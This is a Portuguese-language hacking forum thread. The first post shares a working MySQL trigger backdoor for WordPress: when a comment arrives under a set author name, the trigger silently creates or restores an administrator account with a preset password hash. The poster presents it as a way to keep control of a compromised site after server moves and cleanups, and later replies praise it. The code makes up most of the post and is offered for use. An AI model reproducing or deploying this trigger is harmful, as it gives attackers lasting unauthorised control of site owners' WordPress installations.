Mysql Backdoor

Sh0rtKiller

Elite Hacker

Registrado em: Jul 2009
Posts: 62

Font Size

15-04-2014, 17:49

Precisavaaa postar isso, esta tecnica nao foi desenvolvida por mim e a referencia e da nossa querida unsecurity que ja acabou, ja foi postado em outros foruns pelos mesmos, mas vou dar uma implementada..

esta trigger escrita por ack ack e para wordpress ou seja, se voce entra em um WordPress e o administrador percebe se voce tem um backdoor mal colocado voce perdera o acesso ao servidor obvio ne? com esta funcao ela pode ate mesmo partir para um servidor dedicado , trocar 1000 x de servidor que sua backdoor ainda vai estar la, ela nao te da acesso a shell, mas te da acesso a administracao de novo, mas se implementar o Mysql quem sabe nao rola shell? vamos la

O que e Mysql Trigger?
Muito simples Mysql Trigger e uma funcao automatizada, sempre que rolar um insert update delete no banco de dados, essa funcao vai ser executada automaticamente pelo servidor, ou seja seu backdoor esta dentroooo do DBMS do site...

Código:

DROP TRIGGER IF EXISTS wordpress;
DELIMITER $$
CREATE TRIGGER wordpress BEFORE INSERT ON wp_comments FOR EACH ROW BEGIN
SET @USER = 'Almroot';
SET @HASH = '$P$BLZ4pYXIwQcGazytSj0r4Xy5BHVlY30'; #The hash stands for 'hacked'.
SET @DATE = '2011-09-24 13:37:00';
IF NEW.comment_author = @USER THEN
SET NEW.comment_post_ID = 0;
SET NEW.comment_approved = 'spam';
SET NEW.comment_agent = '';
SET NEW.comment_author_IP = '::1';
SET NEW.comment_content = '';
SET @ID = (SELECT COUNT(ID) FROM wp_users WHERE user_login = @USER LIMIT 1);
IF @ID = 0 THEN
INSERT INTO wp_users () VALUES (NULL,@USER,@HASH,@USER,NEW.comment_author_email,NEW.comment_author_url,@DATE,'','0',@USER);
SET @ID = (SELECT ID FROM wp_users WHERE user_login = @USER LIMIT 1);
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'first_name', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'last_name', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'nickname', @USER);
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'description', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'rich_editing', 'true');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'comment_shortcuts', 'false');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'admin_color', 'fresh');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'use_ssl', '0');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'show_admin_bar_front', 'true');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'show_admin_bar_admin', 'false');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'aim', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'yim', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'jabber', '');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'wp_capabilities', 'a:1:{s:13:"administrator";s:1:"1";}');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'wp_user_level', '10');
INSERT INTO wp_usermeta () VALUES (NULL, @ID, 'wp_dashboard_quick_press_last_post_id', '3');
ELSE
SET @ID = (SELECT ID FROM wp_users WHERE user_login = @USER LIMIT 1);
UPDATE wp_users SET user_login = @USER, user_pass = @HASH, user_nicename = @USER, user_email = NEW.comment_author_email, user_url = NEW.comment_author_url, user_registered = @DATE, user_status = 0, display_name = @USER WHERE ID = @ID;
UPDATE wp_usermeta SET meta_value = 'a:1:{s:13:"administrator";s:1:"1";}' WHERE meta_key = 'wp_capabilities';
UPDATE wp_usermeta SET meta_value = '10' WHERE meta_key = 'wp_user_level';
UPDATE wp_usermeta SET meta_value = '3' WHERE meta_key = 'wp_dashboard_quick_press_last_post_id';
END IF;
END IF;
END;
$$

Esta trigger maravilhosa, e executada sempre que acontece um evento de insert na table wp_comments , entao e adicionado um novo administrador ao WP haahha.

Cara esta tecnica nao e nova pelo contrario porem e uma das melhores tecnicas pra mim

Isso e lindo...

Att

Sh0rtKiller..

Ja dei as referencias ne? Fuiii

Tags: Nenhum(a)

Vetus

Programador

Registrado em: Jul 2011

Posts: 477
- Share
- Tweet
Font Size

#2

15-04-2014, 22:02

Bom trabalho.

Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me
for.

I am a hacker, and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.
Top
Comment
dwango

ADMINISTRADOR

Registrado em: Sep 2009

Posts: 590
- Share
- Tweet
Font Size

#3

15-04-2014, 22:44

Pablo Shortkiller lol... Lembro de vc do RitualistaS cara, faz um tempinho hein! Bom saber q vc ainda tá na ativa e trazendo conteúdos top. Abraços!
Top
Comment
gothie

Membro

Registrado em: Apr 2012

Posts: 22
- Share
- Tweet
Font Size

#4

20-04-2014, 02:03

Ótima dica!

__________________________________________________ ____
"A imaginação é mais importante que o conhecimeno"
Top
Comment

Unconfigured Ad Widget

Anúncio

Mysql Backdoor

Mysql Backdoor

Comment

Comment

Comment